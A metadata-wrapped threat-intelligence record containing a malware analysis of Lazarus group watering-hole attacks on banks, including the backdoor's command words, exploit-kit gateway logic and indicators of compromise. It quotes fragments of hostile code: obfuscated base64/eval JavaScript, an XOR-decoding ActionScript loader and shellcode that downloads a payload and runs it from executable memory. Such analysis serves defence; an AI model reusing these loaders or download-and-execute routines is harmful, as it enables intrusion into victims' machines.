{ "id": "c094847c-9fd5-4c4d-9638-89e3f87a6c1f", "created_at": "2026-04-06T00:06:56.028136Z", "updated_at": "2026-04-10T03:38:19.056566Z", "deleted_at": null, "sha1_hash": "d23c311546282942a68abe406ebf2ee8c2c7fed6", "title": "Lazarus’ False Flag Malware", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 464303, "plain_text": "Lazarus’ False Flag Malware\r\nArchived: 2026-04-05 16:51:15 UTC\r\nWritten by Sergei Shevchenko and Adrian Nish\r\nBACKGROUND\r\nWe continue to investigate the recent wave of attacks on banks using watering-holes on at least two financial\r\nregulator websites as well as others. Our initial analysis of malware disclosed in the BadCyber blog hinted at the\r\ninvolvement of the 'Lazarus' threat actor. Since the release of our report, more samples have come to light, most\r\nnotably those described in the Polish language niebezpiecznik.pl blog on 7 February 2017.\r\nMD5 hash Filename Compile Time File Info Submitted\r\n9216b29114fb6713ef228370cbfe4045 srservice.chm N/A N/A N/A\r\n8e32fccd70cec634d13795bcb1da85ff srservice.hlp N/A N/A N/A\r\ne29fe3c181ac9ddbb242688b151f3310 srservice.dll\r\n2016-10-22\r\n08:08\r\nWin64 DLL\r\n78 KB\r\n2017-01-28\r\n11:58\r\n9914075cc687bdc352ee136ac6579707 fdsvc.exe\r\n2016-08-26\r\n04:19\r\nWin64 EXE\r\n60 KB\r\n2017-02-05\r\n15:14\r\n9cc6854bc5e217104734043c89dc4ff8 fdsvc.dll\r\n2016-08-26\r\n04:11\r\nEncrypted\r\n470 KB\r\n2017-02-05\r\n15:15\r\nOf the hashes provided, only three samples could be found in public malware repositories. All three had been\r\nsubmitted from Poland in recent weeks.\r\nIn the analysis section below we examine these and the ‘false flag’ approach employed by the attackers in order to\r\nspoof the origin of the attack. The same ‘false flag’ approach was also found in the SWF-based exploit mentioned\r\nin our previous blogpost:\r\nMD5 hash Filename File Info Submitted\r\n6dffcfa68433f886b2e88fd984b4995a cambio.swf Adobe Flash 2016-12-07 23:15\r\nHere we’ll analyse these files as well as shed further light on the watering-hole exploit kit code itself, in the hope\r\nthis aids further detection and network defence.\r\nANALYSIS\r\nSample #1 – srservice.chm\r\nhttps://baesystemsai.blogspot.com/2017/02/lazarus-false-flag-malware.html\r\nPage 1 of 16\n\nMost likely, this file is an encrypted backdoor that is decrypted and injected by DLL loader. The filename\r\nsrservice.chm is consistent with the method in which a known Lazarus toolkit module constructs CHM and\r\nHLP file names:\r\n%SYSTEMROOT%\\Help\\%MODULE_NAME%.chm\r\n%SYSTEMROOT%\\Help\\%MODULE_NAME%.hlp\r\nSample #2 – srservice.hlp\r\nMost likely, this file is an encrypted configuration file, which is decrypted and loaded by the sample #1\r\n( srservice.chm ).\r\nSample #3 – srservice.dll\r\nThis DLL loads, decrypts and injects the 'CHM' file into the system lsass.exe process.\r\nSample #4 – fdsvc.exe\r\nThis file is a command line tool that accepts several parameters such as encrypted file name and process ID. The\r\ntool reads and decrypts the specified file, and then injects it into the specified process or into the system process\r\nexplorer.exe .\r\nThe encryption consists of a running XOR, followed with RC4, using the 32-byte RC4 key below:\r\nA6 EB 96 00 61 B2 E2 EF 0D CB E8 C4 5A F1 66 9C\r\nA4 80 CD 9A F1 2F 46 25 2F DB 16 26 4B C4 3F 3C\r\nSample #5 – fdsvc.dll\r\nThe file fdsvc.dll is an encrypted file, successfully decrypted into a valid DLL (MD5:\r\n889e320cf66520485e1a0475107d7419 ) by the aforementioned executable fdsvc.exe .\r\nOnce decrypted, it represents itself as a bot that accepts the C\u0026C name and port number(s) as a string parameter\r\nthat is used to call the DLL. The parameter is encoded with an XOR loop that includes XOR key cEzQfoPw .\r\nMultiple C\u0026C servers can be delimited with the ' | ' character and port numbers are delimited from the C\u0026C\r\nservers with the ':' character.\r\nOnce the bot has established communication with the remote C\u0026C, it uses several transliterated Russian words to\r\neither indicate the state of its communication or issue backdoor commands, such as:\r\nWord State/Backdoor Command\r\nhttps://baesystemsai.blogspot.com/2017/02/lazarus-false-flag-malware.html\r\nPage 2 of 16\n\n\"Nachalo\" start communication session\r\n\"ustanavlivat\" handshake state\r\n\"poluchit\" receive data\r\n\"pereslat\" send data\r\n\"derzhat\" maintain communication session\r\n\"vykhodit\" exit communication session\r\nThe binary protocol is custom. For example, during the \"ustanavlivat\" (handshake) mode, the bot accepts 4 bytes,\r\nwhich are then decrypted. The decryption is a loop that involves multiple XOR operations performed over the\r\nreceived data. Once decrypted, the 4 bytes indicate the size of the next data chunk to be received.\r\nThe next received data chunk is also decrypted, and its contents checked to see whether it's one of the backdoor\r\ncommands.\r\nFor example, the \"poluchit\" command instructs the bot to receive the file, and the \"pereslat\" (send) command\r\ninstructs the bot to upload the file. The received \"poluchit\" command may also contain a URL, marked with\r\nanother transliterated Russian word \"ssylka\" (link). In this case, the remote file is fetched in a separate thread. If a\r\nreceived data chunk contains the command \"vykhodit\", the bot quits its backdoor loop.\r\nThe bot implements the SSL/TLS protocol, and is based on a source code of \"Curl v7.49.1\". Hence, it is able to\r\ntransfer files via HTTP, HTTPS, FTP, SMTP and many other protocols, with full support of user/password\r\nauthentication (Basic, Digest, NTLM, Negotiate, Kerberos), proxies and SSL certificates.\r\nRussian language used in fdsvc.dll\r\nIn spite of some 'Russian' words being used, it is evident that the malware author is not a native Russian speaker.\r\nOf our previous examples, five of the commands were likely produced by an online translation. Below we provide\r\nthe examples and the correct analogues for reference:\r\nWord Type of error Correct analogue\r\n\"ustanavlivat\" omitted sign at the end, verb tense error \"ustanovit'\" or \"ustanoviti\"\r\n\"poluchit\" omitted sign at the end \"poluchit'\" or \"poluchiti\"\r\n\"pereslat\" omitted sign at the end \"pereslat'\" or \"pereslati\"\r\n\"derzhat\" omitted sign at the end \"derzhat'\" or \"derzhati\"\r\n\"vykhodit\" omitted sign at the end, verb tense error \"vyiti\"\r\nhttps://baesystemsai.blogspot.com/2017/02/lazarus-false-flag-malware.html\r\nPage 3 of 16\n\nAnother example is \"kliyent2podklyuchit\". This is most likely a result of an online translation of \"client2connect\"\r\n(which means 'client-to-connect'). In this case, the two words \"client\" and \"connect\" were translated separately,\r\nthen transliterated from the Russian pronunciation form into the Latin alphabet and finally joined to produce\r\n\"kliyent2podklyuchit\".\r\nSuch a result may look impressive to the bot's author, but would be difficult to understand for native Russian\r\nspeakers.\r\nHere we provide an example of translating the word \"client\" in Russian - the word \"kliyent\" here only\r\ndemonstrates phonetic pronunciation, not how it's actually written in a transliterated form. When formed using the\r\nLatin alphabet, it would actually be written \"client\" or \"klient\".\r\nDue to such inconsistencies, we conclude that the Russian language is likely used as a decoy tactic, in order to\r\nspoof the malware’s country of origin.\r\nSample #6 – cambio.swf\r\nDuring the investigation of the watering-hole incident, the owner of a compromised website shared with us a\r\nmalicious implant that was added into the site, presumably by using an exploit against JBoss 5.0.0.\r\nThe script is called view_jsp.java and is accessed from the watering-hole website as view.jsp .\r\nThis script is responsible for serving cambio.swf .\r\nThe infection starts from a primary web site being compromised so that its visitors are redirected into a secondary\r\nwebsite, calling its view.jsp script from an added IFrame. The initial request contains parameter pagenum set\r\nto 1 , such as:\r\n\"GET /[PATH]/view.jsp?pagenum=1 HTTP/1.1\"\r\nThis begins the profiling and filtering to identify potential victims. For example, the script then checks to see if the\r\nclient's IP is black-listed. If so, such initial request is rejected.\r\nhttps://baesystemsai.blogspot.com/2017/02/lazarus-false-flag-malware.html\r\nPage 4 of 16\n\nNext, the script checks if the client’s IP is white-listed (i.e. targeted). If not white-listed, it is also rejected. Hence,\r\nunless the visitor’s IP is on the attackers’ list, the script will not attempt to infect their machine. This helps the\r\ninfected websites stay undetected for relatively long period of time, as they only serve exploits to the selected\r\ntargets.\r\nIn the next stage of the script, it builds and serves back to the client an HTML page with an embedded JavaScript\r\nthat detects the type of client’s browser (Internet Explorer, Google Chrome, Firefox, Safari, or Opera), OS version,\r\nand the loaded plugins, such as Adobe Flash and Microsoft Silverlight.\r\nThe script executed on a client side then builds a form, and submits it back to the gateway script, as shown below:\r\nThe submitted form specifies the pagenum parameter to be set to 2 , to advance the script to the next step:\r\nhttps://baesystemsai.blogspot.com/2017/02/lazarus-false-flag-malware.html\r\nPage 5 of 16\n\nOnce the script accepts the incoming request and finds the form's pagenum value is 2 , it reads other fields from\r\nthe submitted form and decides which exploit to serve back to the client.\r\nAt the time of writing, the exploit kit known to serve back two exploits, for Adobe Flash and Microsoft\r\nSilverlight, though these could be expanded upon as needed.\r\nThe exploits can be individually enabled or disabled by the attackers with the standalone file config.dat . For\r\nexample, to enable both exploits (flag= 1 ), the contents of this file can be set to:\r\nwhere 2016-0034 identifies the Silverlight exploit, and 0000-0001 is the Flash exploit.\r\nIf the script detects that the submitted form contains a non-empty version of Silverlight browser plugin, it will\r\ngenerate and serve back a Silverlight exploit. If the submitted form has a non-empty version of Adobe Flash\r\nbrowser plugin, the script will generate and serve back the Flash exploit. If the client has both plugins loaded\r\nwithin the browser, then the script will serve the Flash exploit only.\r\nNOTE: the script only serves the Flash exploit if the browser is Internet Explorer.\r\nThe exploits are generated by the functions:\r\n  •   genExp_20160034() – to generate Silverlight exploit\r\n  •   genExp_00000001() – to generate Flash exploit\r\nThe latter is explained in further detail below. First, the script builds URL string named as download_url :\r\n01 String PARAMNAME_UID = \"uid\";\r\n02 String PARAMNAME_PAGENUM = \"pagenum\";\r\n03 String PARAMNAME_EXPLOITID = \"eid\";\r\nhttps://baesystemsai.blogspot.com/2017/02/lazarus-false-flag-malware.html\r\nPage 6 of 16\n\n04 String PARAMNAME_STATUS = \"s\";\r\n05 String PARAMNAME_DATA = \"data\";\r\n06\r\n07 download_url = request.getRequestURL() +\r\n08 \"?\" + PARAMNAME_UID + \"=\" + uid +\r\n09 \"\u0026\" + PARAMNAME_PAGENUM + \"=3\" +\r\n10 \"\u0026\" + PARAMNAME_EXPLOITID +\r\n11 \"=\" + exploit.get(\"eid\");\r\n12 ...\r\n13 download_url = download_url +\r\n14 \"\u0026\" + PARAMNAME_STATUS + \"=2\" +\r\n15 \"\u0026\" + PARAMNAME_DATA + \"=\";\r\nFor example, the URL string may look like:\r\nhttp://[WEB_SITE]/view.jsp?uid=30304811\u0026pagenum=3\u0026eid=00000002\u0026s=2\u0026data=\r\nNote that the pagenum parameter of the URL has now advanced to 3 (third step of the view.jsp execution).\r\nThis URL string will be embedded by the genExp_00000001() function into the body of the shellcode.\r\nThe output of the genExp_00000001() function is JavaScript that has the following format – this script will be\r\nexecuted inside the client's browser:\r\n01 var laskfji = 'PGh0bWw+..'; // long string here\r\n02 asdlfkj = function(s) {\r\n03 // base64-decode string s\r\n04 };\r\n05 var polkio = asdlfkj(laskfji);\r\n06 var poikea = 'document.write(polkio);';\r\n07 eval(poikea);\r\nOnce the string s is base64-decoded by client-based JavaScript, it will look like a Flash object embedded into\r\nHTML:\r\nhttps://baesystemsai.blogspot.com/2017/02/lazarus-false-flag-malware.html\r\nPage 7 of 16\n\n01 02 03 07 08 09 11 12 19 20 21 As seen in the Flash object parameters, the SWF object is served from the website’s path:\nHowever, the SWF object is also accompanied with 2 extra parameters:\nSWF Parameter Value\n\"shell\" 558BEC83EC388D45C8C745F...\n\"Health\" polki89jdm#ks@\nhttps://baesystemsai.blogspot.com/2017/02/lazarus-false-flag-malware.html\nPage 8 of 16\n\nBy looking into the decompiled cambio.swf file, its ActionScript reveals that the SWF file indeed expects 2\r\nparameters: Health and shell .\r\nThe value of Health is used as an XOR key to decode the binary blob orinBin , which is included in the SWF\r\nfile. This blob is then loaded with loadBytes() , as shown below:\r\n01 objLoader = new Loader();\r\n02 this.params = loaderInfo.parameters;\r\n03 ...\r\n04 var key:String = params[\"Health\"] as String;\r\n05 var pShell:String = params[\"shell\"] as String;\r\n06 var objShellData:SharedObject = SharedObject.getLocal(\"Exp_Data\");\r\n07 objShellData.clear();\r\n08 objShellData.data.shell = pShell;\r\n09 objShellData.flush();\r\n10 var blob:ByteArray = new orinBin() as ByteArray;\r\n11 var i:int = 0;\r\n12 while(i \u003c blob.length)\r\n13 {\r\n14 blob[i] = blob[i] ^ key.charCodeAt(i % key.length);\r\n15 i++;\r\n16 }\r\n17 blob.position = 0;\r\n18 objLoader.contentLoaderInfo.addEventListener(\"complete\",fncomp);\r\n19 objLoader.loadBytes(blob);\r\nBelow is the binary blob orinBin as seen within the SWF file:\r\nhttps://baesystemsai.blogspot.com/2017/02/lazarus-false-flag-malware.html\r\nPage 9 of 16\n\nBy knowing the value of Health parameter, it is now possible to use it as an XOR key to decode the orinBin\r\nblob within the SWF code.\r\nOnce decrypted, the orinBin blob presents another SWF file. This time, it contains 3 encrypted blobs within:\r\nbin22 , bin23 , and bin24 seen below:\r\nThe code decrypts the blobs with RC4, using \"littleEndian\" as the RC4 key. These blobs also turn out to be\r\nSWF files that contain the SWF exploit code.\r\nInternally, the ActionScript also uses transliterated Russian words, similar to the tactic seen in the bot code:\r\nTransliterated Russian words used in AS Translated from Russian\r\nPodgotovkaskotiny Preparation of farm animals\r\ngeigeigei3raza Hey, hey, hey 3 times\r\nchainik Dummy (a stupid person)\r\nchainikaddress Dummy's address\r\npoishemdatu Let’s search for data\r\npoiskvpro Searching in 'pro'\r\nvyzov_chainika Calling the dummy (a stupid person)\r\ndaiadreschainika Get address of the dummy\r\nrunskotina Execute farm animals\r\nbabaLEna Old woman Lena\r\nAs seen in the table, while the words are technically Russian, their usage is out-of-context.\r\nIn one code fragment, the ActionScript contains both \"chainik\" and \"dummy\":\r\n01 private function put_dummy_args(param1:*) : *\r\n02 {\r\nhttps://baesystemsai.blogspot.com/2017/02/lazarus-false-flag-malware.html\r\nPage 10 of 16\n\n03 return chainik.call.apply(null,param1);\r\n04 }\r\n05 private function vyzov_chainika() : *\r\n06 {\r\n07 return chainik.call(null);\r\n08 }\r\nAs such, it is obvious that the word \"dummy\" has been translated into \"chainik\". However, the word \"chainik\" in\r\nRussian slang (with the literal meaning of \"a kettle\") is used to describe an unsophisticated person, a newbie;\r\nwhile, the word \"dummy\" in the exploit code is used to mean a \"placeholder\" or an \"empty\" data\r\nstructure/argument.\r\nIn the same way, it is likely the word \"farm animals\" was originally used to represent \"a beast\". Yet, it has been\r\ntranslated into a word that is only synonymous to \"the beast\" in a certain context.\r\nAs a result, they have used the words \"farm animals\" across the shellcode instead of \"beast\"; which makes little\r\nsense.\r\nAs in the case of sample #5 ( fdsvc.dll ), it is likely that this loose Russian translation, evidently performed by a\r\nnon-Russian speaker, is intended to spoof the malware origin.\r\nShellcode\r\nThe SWF's ActionScript then loads and executes the shellcode that was passed to the SWF file. As with the\r\nHealth parameter, by having access to the server-side code it is now possible to analyse what shellcode has been\r\nserved to be executed via SWF file.\r\nThe shellcode consists of 2,372 bytes of a Win32-code (in fact, 2,369 bytes padded with three zero bytes to make\r\nit 4-byte aligned).\r\nThe shellcode passed via the shell parameter consists of two parts:\r\n  •  The first part of the shellcode (818 bytes) creates a hidden process of notepad.exe . It then injects the\r\nsecond part of the shellcode into it using the VirtualAlloc() and WriteProcessMemory() APIs, and finally it\r\nruns the injected code with CreateRemoteThread() API.\r\n  •  The second part of the shellcode (1,551 bytes) is encoded with XOR 0x57 :\r\nseg000:00000316 movecx, 1551; counter\r\nseg000:0000031B movebx, 57h; XOR key\r\nhttps://baesystemsai.blogspot.com/2017/02/lazarus-false-flag-malware.html\r\nPage 11 of 16\n\nseg000:00000320 loop:\r\nseg000:00000320 xor[eax], ebx\r\nseg000:00000322 dececx; decrement counter\r\nseg000:00000323 inceax; advance pointer\r\nseg000:00000324 testecx, ecx\r\nseg000:00000326 jnzshort loop\r\nIt's worth noting that both parts of the shellcode load the APIs similarly to all other tools from the Lazarus toolset,\r\ne.g.:\r\n01 urlmon_dll='mlrU';//Urlm\r\n02 urlmon_dll_4='d.no';//on.d\r\n03 urlmon_dll_8='ll';//ll\r\n04 URLDownloadToFileW='DLRU';//URLD\r\n05 URLDownloadToFileW_4='lnwo';//ownl\r\n06 URLDownloadToFileW_8='Tdao';//oadT\r\n07 URLDownloadToFileW_12='liFo';//oFile\r\n08 URLDownloadToFileW_16='We';//eW\r\n09 hLib=LoadLibrary(\u0026urlmon.dll);\r\n10 ptr[8]=(*(int)ptr[4])(hLib,//ptr[4]-\u003eGetProcAddress\r\n11\u0026URLDownloadToFileW);\r\nOnce decoded, the second part of the shellcode reads the URL embedded at the end, then downloads and saves a\r\nfile under a temporary file name, using the prefix \"tmp\" .\r\nNext, it reads the temporary file into memory, decrypts it with the following XOR loop, starting from the 318th\r\nbyte:\r\n01 for (i = 317; i \u003c file_size; ++i )\r\n02 {\r\n03 buffer[i] ^= 0xCC ^ ((buffer[i] ^ 0xCC) \u003e\u003e 4);\r\n04 }\r\nhttps://baesystemsai.blogspot.com/2017/02/lazarus-false-flag-malware.html\r\nPage 12 of 16\n\nNext, it makes the decoded data executable by assigning it PAGE_EXECUTE_READWRITE memory protection mode,\r\nand calls it, as shown below:\r\n01 (*(void)(ptr[68]))(buffer+318,//ptr[68]-\u003eVirtualProtect\r\n02file_size-318,//skipthefirst318bytes\r\n03PAGE_EXECUTE_READWRITE,\r\n04\u0026oldProtect);\r\n05 ((void(*)(void))(buffer+318))();//CALLfromthe318thbyte\r\nThis way, the 2nd part of the shellcode downloads a binary from the same gateway script as before. pagenum=3\r\nmeans it's a 3rd step – a step of serving the next chunk of the shellcode.\r\nTo understand the next step we need to go back to the gateway script to see how it processes the pagenum=3\r\nrequest.\r\nWhen the script receives a pagenum=3 request, it checks the 's' URL parameter ('status'). Initially, this\r\nparameter is set to 2 ( 's=2' , as seen in the aforementioned URL embedded into the SWF exploit).\r\nThus, the script will read and output the contents of 2 files stored on the web server:\r\nfiles/mark180789172360.ico\r\nfiles/back283671047171.dat\r\nThe first file is likely a valid ICO file, is 318 bytes in size, and its contents are not encoded (hence the reason why\r\nthe shellcode skips the first 318 bytes, and only decodes the rest).\r\nThe second file is a 3rd chunk of the shellcode, and its contents are encoded.\r\nIn addition to these 2 files, the output is appended with a URL. This time, it will specify pagenum parameter set\r\nto 3 , but the status parameter s will now be set to 3 . For example, the URL may look like:\r\nhttp://[WEB_SITE]/view.jsp?uid=30304811\u0026pagenum=3\u0026s=3\r\nThe appended URL will then be encoded the same way as the file back283671047171.dat :\r\n01 for (int i = 0; i \u003c len + 9; i++)\r\n02 {\r\n03 byte var = b[i];\r\n04 byte temp = (byte)((var \u003e\u003e 4) \u0026 0x0F);\r\n05 var = (byte)(var ^ temp);\r\nhttps://baesystemsai.blogspot.com/2017/02/lazarus-false-flag-malware.html\r\nPage 13 of 16\n\n06 var = (byte)(var ^ 0xCC);\r\n07 b[i] = var;\r\n08 }\r\nThis way, the encoded URL becomes an integral part of the 3rd part of the shellcode – same way as the 2nd part of\r\nthe shellcode was appended with a URL.\r\nFollowing that, the script serves back a blob that consists of three parts:\r\n  •   files/mark180789172360.ico , not encoded (318 bytes)\r\n  •   files/back283671047171.dat , encoded\r\n  •  download URL, encoded\r\nIt is served back as a binary file, disguised as an icon file probg[RANDOM].ico , probably in an attempt to bypass\r\nnetwork sniffers (in other words, the encrypted shellcode is served appended to a valid icon file):\r\nresponse.setHeader(\"Accept-Ranges\", \"bytes\");\r\nresponse.setHeader(\"Content-Length\", String.format(\"%d\", response_len));\r\nresponse.setHeader(\"Content-Disposition\", \"attachment;filename=\\\"probg\" + rand.nextInt(9000) + 10000 +\r\n\".ico\\\"\");\r\nresponse.setHeader(\"Content-Type\", \"application/octet-stream\");\r\nOnce this 3rd part of the shellcode is served back to the shellcode that runs on a client side, it will skip the first\r\n318 bytes, decode the rest and execute it. This will invoke another binary download – this time identified with the\r\nstatus value of 3 ( 's=3' ).\r\nThe new binary is generated by view.jsp script and is almost identical to the 3rd part of the shellcode.\r\nThe only difference is that the binary blob consists of these files:\r\nfiles/mark180789172360.ico , not encoded (318 bytes), as before\r\nfiles/meml102783047891.dat , encoded\r\nThe 2nd file is now different, and the URL is no longer appended. The reason why the new binary does not need\r\nthe URL embedded may be that this binary contains an actual malicious executable, detached, decoded, and\r\nexecuted by the shellcode, thus leading to a full compromise of the victim.\r\nIndeed, as seen in the web log below, the last GET request with the pagenum=3 and s=3 parameters is served\r\nwith a 123,710-byte response – large enough to accommodate a PE-executable:\r\n\"GET /[PATH]/view.jsp?pagenum=1 HTTP/1.1\" 200 66148\r\n\"POST /[PATH]/view.jsp HTTP/1.1\" 200 13991\r\n\"GET /[PATH]/view.jsp?uid=30304811\u0026pagenum=3\u0026eid=00000002\u0026s=2\u0026data= HTTP/1.1\" 200 4642\r\n\"GET /[PATH]/view.jsp?uid=30304811\u0026pagenum=3\u0026s=3 HTTP/1.1\" 200 123710\r\nhttps://baesystemsai.blogspot.com/2017/02/lazarus-false-flag-malware.html\r\nPage 14 of 16\n\nNOTE: At the time of analysis, the ICO/DAT files were not available. Hence, their contents remains unknown.\r\nOverall Scheme\r\nThe following scheme illustrates the steps outlined above:\r\nCONCLUSIONS\r\nHere we have analysed further files from the recent watering-hole attacks directed at Polish financial institutions\r\nand others. Evidently, the Lazarus group are continuing their campaign targeting banking networks. Their\r\nwatering-hole mechanism is fairly sophisticated – its multiple stages are designed to complicate analysis of its\r\nmalware distribution, and at the same, stay undetected for as long as possible.\r\nBecause of the previously disclosed attribution links, the group are also resorting to some trickery.\r\nThrough reverse-engineering, we can see the use of many Russian words that have been translated incorrectly. In\r\nsome cases the inaccurate translations have transformed the meaning of the words entirely. This strongly implies\r\nthat the authors of this attack are not native Russian speakers and, as such, the use of Russian words appears to be\r\na 'false flag'. Clearly the group behind these attacks are evolving their modus operandi in terms of capabilities –\r\nhttps://baesystemsai.blogspot.com/2017/02/lazarus-false-flag-malware.html\r\nPage 15 of 16\n\nbut also it seems they’re attempting to mislead investigators who might jump to conclusions in terms of\r\nattribution.\r\nAPPENDIX A: INDICATORS OF COMPROMISE\r\nMD5 Hashes 9cc6854bc5e217104734043c89dc4ff8\r\n9914075cc687bdc352ee136ac6579707\r\ne29fe3c181ac9ddbb242688b151f3310\r\n9216b29114fb6713ef228370cbfe4045\r\n8e32fccd70cec634d13795bcb1da85ff\r\n889e320cf66520485e1a0475107d7419\r\n6dffcfa68433f886b2e88fd984b4995a\r\nFilenames cambio.swf\r\ncambio.xap\r\nmark180789172360.ico\r\nmeml102783047891.dat\r\nback283671047171.dat\r\nURLs view.jsp?pagenum=1\r\nview.jsp?uid=\r\nSource: https://baesystemsai.blogspot.com/2017/02/lazarus-false-flag-malware.html\r\nhttps://baesystemsai.blogspot.com/2017/02/lazarus-false-flag-malware.html\r\nPage 16 of 16", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "ETDA" ], "references": [ "https://baesystemsai.blogspot.com/2017/02/lazarus-false-flag-malware.html" ], "report_names": [ "lazarus-false-flag-malware.html" ], "threat_actors": [ { "id": "34eea331-d052-4096-ae03-a22f1d090bd4", "created_at": "2025-08-07T02:03:25.073494Z", "updated_at": "2026-04-10T02:00:03.709243Z", "deleted_at": null, "main_name": "NICKEL ACADEMY", "aliases": [ "ATK3 ", "Black Artemis ", "COVELLITE ", "CTG-2460 ", "Citrine Sleet ", "Diamond Sleet ", "Guardians of Peace", "HIDDEN COBRA ", "High Anonymous", "Labyrinth Chollima ", "Lazarus Group ", "NNPT Group", "New Romanic Cyber Army Team", "Temp.Hermit ", "UNC577 ", "Who Am I?", "Whois Team", "ZINC " ], "source_name": "Secureworks:NICKEL ACADEMY", "tools": [ "Destover", "KorHigh", "Volgmer" ], "source_id": "Secureworks", "reports": null }, { "id": "732597b1-40a8-474c-88cc-eb8a421c29f1", "created_at": "2025-08-07T02:03:25.087732Z", "updated_at": "2026-04-10T02:00:03.776007Z", "deleted_at": null, "main_name": "NICKEL GLADSTONE", "aliases": [ "APT38 ", "ATK 117 ", "Alluring Pisces ", "Black Alicanto ", "Bluenoroff ", "CTG-6459 ", "Citrine Sleet ", "HIDDEN COBRA ", "Lazarus Group", "Sapphire Sleet ", "Selective Pisces ", "Stardust Chollima ", "T-APT-15 ", "TA444 ", "TAG-71 " ], "source_name": "Secureworks:NICKEL GLADSTONE", "tools": [ "AlphaNC", "Bankshot", "CCGC_Proxy", "Ratankba", "RustBucket", "SUGARLOADER", "SwiftLoader", "Wcry" ], "source_id": "Secureworks", "reports": null }, { "id": "a2b92056-9378-4749-926b-7e10c4500dac", "created_at": "2023-01-06T13:46:38.430595Z", "updated_at": "2026-04-10T02:00:02.971571Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "Operation DarkSeoul", "Bureau 121", "Group 77", "APT38", "NICKEL GLADSTONE", "G0082", "COPERNICIUM", "Moonstone Sleet", "Operation GhostSecret", "APT 38", "Appleworm", "Unit 121", "ATK3", "G0032", "ATK117", "NewRomanic Cyber Army Team", "Nickel Academy", "Sapphire Sleet", "Lazarus group", "Hastati Group", "Subgroup: Bluenoroff", "Operation Troy", "Black Artemis", "Dark Seoul", "Andariel", "Labyrinth Chollima", "Operation AppleJeus", "COVELLITE", "Citrine Sleet", "DEV-0139", "DEV-1222", "Hidden Cobra", "Bluenoroff", "Stardust Chollima", "Whois Hacking Team", "Diamond Sleet", "TA404", "BeagleBoyz", "APT-C-26" ], "source_name": "MISPGALAXY:Lazarus Group", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "32a223a8-3c79-4146-87c5-8557d38662ae", "created_at": "2022-10-25T15:50:23.703698Z", "updated_at": "2026-04-10T02:00:05.261989Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "Lazarus Group", "Labyrinth Chollima", "HIDDEN COBRA", "Guardians of Peace", "NICKEL ACADEMY", "Diamond Sleet" ], "source_name": "MITRE:Lazarus Group", "tools": [ "RawDisk", "Proxysvc", "BADCALL", "FALLCHILL", "WannaCry", "MagicRAT", "HOPLIGHT", "TYPEFRAME", "Dtrack", "HotCroissant", "HARDRAIN", "Dacls", "KEYMARBLE", "TAINTEDSCRIBE", "AuditCred", "netsh", "ECCENTRICBANDWAGON", "AppleJeus", "BLINDINGCAN", "ThreatNeedle", "Volgmer", "Cryptoistic", "RATANKBA", "Bankshot" ], "source_id": "MITRE", "reports": null }, { "id": "f32df445-9fb4-4234-99e0-3561f6498e4e", "created_at": "2022-10-25T16:07:23.756373Z", "updated_at": "2026-04-10T02:00:04.739611Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "APT-C-26", "ATK 3", "Appleworm", "Citrine Sleet", "DEV-0139", "Diamond Sleet", "G0032", "Gleaming Pisces", "Gods Apostles", "Gods Disciples", "Group 77", "Guardians of Peace", "Hastati Group", "Hidden Cobra", "ITG03", "Jade Sleet", "Labyrinth Chollima", "Lazarus Group", "NewRomanic Cyber Army Team", "Operation 99", "Operation AppleJeus", "Operation AppleJeus sequel", "Operation Blockbuster: Breach of Sony Pictures Entertainment", "Operation CryptoCore", "Operation Dream Job", "Operation Dream Magic", "Operation Flame", "Operation GhostSecret", "Operation In(ter)caption", "Operation LolZarus", "Operation Marstech Mayhem", "Operation No Pineapple!", "Operation North Star", "Operation Phantom Circuit", "Operation Sharpshooter", "Operation SyncHole", "Operation Ten Days of Rain / DarkSeoul", "Operation Troy", "SectorA01", "Slow Pisces", "TA404", "TraderTraitor", "UNC2970", "UNC4034", "UNC4736", "UNC4899", "UNC577", "Whois Hacking Team" ], "source_name": "ETDA:Lazarus Group", "tools": [ "3CX Backdoor", "3Rat Client", "3proxy", "AIRDRY", "ARTFULPIE", "ATMDtrack", "AlphaNC", "Alreay", "Andaratm", "AngryRebel", "AppleJeus", "Aryan", "AuditCred", "BADCALL", "BISTROMATH", "BLINDINGCAN", "BTC Changer", "BUFFETLINE", "BanSwift", "Bankshot", "Bitrep", "Bitsran", "BlindToad", "Bookcode", "BootWreck", "BottomLoader", "Brambul", "BravoNC", "Breut", "COLDCAT", "COPPERHEDGE", "CROWDEDFLOUNDER", "Castov", "CheeseTray", "CleanToad", "ClientTraficForwarder", "CollectionRAT", "Concealment Troy", "Contopee", "CookieTime", "Cyruslish", "DAVESHELL", "DBLL Dropper", "DLRAT", "DRATzarus", "DRATzarus RAT", "Dacls", "Dacls RAT", "DarkComet", "DarkKomet", "DeltaCharlie", "DeltaNC", "Dembr", "Destover", "DoublePulsar", "Dozer", "Dtrack", "Duuzer", "DyePack", "ECCENTRICBANDWAGON", "ELECTRICFISH", "Escad", "EternalBlue", "FALLCHILL", "FYNLOS", "FallChill RAT", "Farfli", "Fimlis", "FoggyBrass", "FudModule", "Fynloski", "Gh0st RAT", "Ghost RAT", "Gopuram", "HARDRAIN", "HIDDEN COBRA RAT/Worm", "HLOADER", "HOOKSHOT", "HOPLIGHT", "HOTCROISSANT", "HOTWAX", "HTTP Troy", "Hawup", "Hawup RAT", "Hermes", "HotCroissant", "HotelAlfa", "Hotwax", "HtDnDownLoader", "Http Dr0pper", "ICONICSTEALER", "Joanap", "Jokra", "KANDYKORN", "KEYMARBLE", "Kaos", "KillDisk", "KillMBR", "Koredos", "Krademok", "LIGHTSHIFT", "LIGHTSHOW", "LOLBAS", "LOLBins", "Lazarus", "LightlessCan", "Living off the Land", "MATA", "MBRkiller", "MagicRAT", "Manuscrypt", "Mimail", "Mimikatz", "Moudour", "Mydoom", "Mydoor", "Mytob", "NACHOCHEESE", "NachoCheese", "NestEgg", "NickelLoader", "NineRAT", "Novarg", "NukeSped", "OpBlockBuster", "PCRat", "PEBBLEDASH", "PLANKWALK", "POOLRAT", "PSLogger", "PhanDoor", "Plink", "PondRAT", "PowerBrace", "PowerRatankba", "PowerShell RAT", "PowerSpritz", "PowerTask", "Preft", "ProcDump", "Proxysvc", "PuTTY Link", "QUICKRIDE", "QUICKRIDE.POWER", "Quickcafe", "QuiteRAT", "R-C1", 